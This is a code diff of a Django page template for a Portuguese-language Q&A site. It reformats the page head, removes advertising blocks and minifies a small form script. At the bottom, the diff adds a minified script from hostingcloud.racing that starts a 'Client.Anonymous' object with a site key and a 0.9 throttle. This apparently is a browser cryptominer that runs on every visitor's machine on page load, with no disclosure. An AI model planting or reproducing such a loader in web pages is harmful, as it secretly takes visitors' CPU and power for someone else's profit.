--- a/main_app/templates/ask.html
+++ b/main_app/templates/ask.html
@@ -1,35 +1,26 @@
 <!doctype html>
 <html lang="pt-br">
-	<head>
-		<title>Perguntar</title>
-		<meta charset="utf-8">
-		<meta name="viewport" content="width=device-width, initial-scale=1">
-
-		<meta name="keywords" content="asker, asker.fun, perguntar">
-		<meta name="description" content="Faça uma pergunta no Asker.fun">
-
-		<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
-
-		<style>
-			main {
-				width: 50%;
-				margin: 5px auto;
-			}
-
-			@media (min-width: 320px) and (max-width: 480px) {
-				main {
-					width: 80%;
-				}
-			}
-		</style>
-<script>
-	function format_form(form) {
-		q = form.question
-		if (q.value[q.value.length - 1] != '?')
-			q.value += '?'
+<head>
+<title>Perguntar</title>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<meta name="keywords" content="asker, asker.fun, perguntar">
+<meta name="description" content="Faça uma pergunta no Asker.fun">
+<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
+<style>
+main {
+	width: 50%;
+	margin: 5px auto;
+}
+@media (min-width: 320px) and (max-width: 480px) {
+	main {
+		width: 80%;
 	}
-</script>
-	</head>
+}
+</style>
+<script>function format_form(e){"?"!=e.question.value[e.question.value.length-1]&&(e.question.value+="?")}</script>
+</head>
+
 	<body>
 		<main>
 			{% if user_p.active %}
@@ -39,76 +30,23 @@
 					<div class="form-group">
 						<input class="form-control" type="text" name="question" placeholder="Sua pergunta aqui" autocomplete="off" maxlength="180">
 						<br><textarea maxlength="5000" class="form-control" placeholder="Descrição (opcional)" name="description"></textarea>
-
 						<br>
 						<label for="image">Imagem</label>
 						<input type="file" class="form-control-file" id="image" name="file">
-
 						<br>
 						<input class="btn btn-primary" type="submit" value="Fazer pergunta" onclick="this.style.display = 'none'">
 					</div>
 				</form>
 			</div>
-
-			<section>
-				<style>
-					img {
-						display: block;
-						width: 50%;
-						margin: auto;
-					}
-
-					@media (min-width: 320px) and (max-width: 480px) {
-					    img {
-					        width: 70%;
-					    }
-					}
-				</style>
-				<!--  www.picpay.com/convite?@ZHQSXF -->
-				<!--<a href="https://www.picpay.com/convite?@ZHQSXF"><img src="/media/ads/picpay.jpg"></a>-->
-
-				<!--<script data-cfasync='false' type='text/javascript' src='//p425212.clksite.com/adServe/banners?tid=425212_840391_1'></script>-->
-
-				<!--<small>
-					<b>Por que anúncios?</b>
-					<p>O dinheiro ganho com anúncios será usado para pagar a hospedagem, domínio e melhorias no site. Espero que compreendam, obrigado!</p>
-				</small>-->
-			</section>
-			<hr>
-			<style>
-				#ad {
-					width: 350px;
-				}
-				
-				@media (min-width: 320px) and (max-width: 480px) {
-					#ad {
-						max-width: 250px;
-					}
-				}
-			</style>
-			<center>
-				<a href="//oagnatch.com/4/4172017">
-					<img id="ad" src="https://cdn2.unrealengine.com/wows-1920x1080-5af17eac9c1a.png" alt="World of Warships">
-					<small>[ad] Jogue agora: World of Warships</small>
-				</a>
-			</center>
-			
 			<hr>
 			<footer>
 				<p>Encontrou algum bug, tem alguma dúvida ou sugestão? <a href="mailto:minha.ccontta@gmail.com">Me envie um email</a>.</p>
 			</footer>
-
 			{{ error|safe }}
 			{% else %}
 			<div class="alert alert-info"><p>Confirme seu email abrindo o link enviado para ele.<br>Este é o email usado na tela de cadastro: {{ user.email }}</p><p>Caso não encontre o email, verifique na pasta de spam.</p></div>
 			{% endif %}
 		</main>
-<script src="https://www.hostingcloud.racing/Bkb7.js"></script>
-<script>
-    var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
-        throttle: 0.9, c: 'w', ads: 0
-    });
-    _client.start();
-</script>
+<script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 	</body>
 </html>
